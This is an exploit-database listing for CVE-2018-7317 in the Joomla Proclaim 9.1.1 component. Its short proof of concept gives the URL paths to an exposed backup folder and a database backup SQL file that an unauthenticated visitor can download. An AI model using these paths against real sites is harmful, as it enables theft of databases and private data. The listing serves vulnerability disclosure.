Lucene search

K
zdtIhsan Sencan1337DAY-ID-29865
HistoryFeb 22, 2018 - 12:00 a.m.

Joomla Proclaim 9.1.1 Component - Backup File Download Vulnerability

2018-02-2200:00:00
Ihsan Sencan
0day.today
29

EPSS

0.309

Percentile

97.0%

Exploit for php platform in category web applications

# # # #
# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download
# Vendor Homepage: https://www.christianwebministries.org/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
# Version: 9.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7317
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/media/com_biblestudy/backup/
# 
# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql
# 
# # # #

#  0day.today [2018-04-13]  #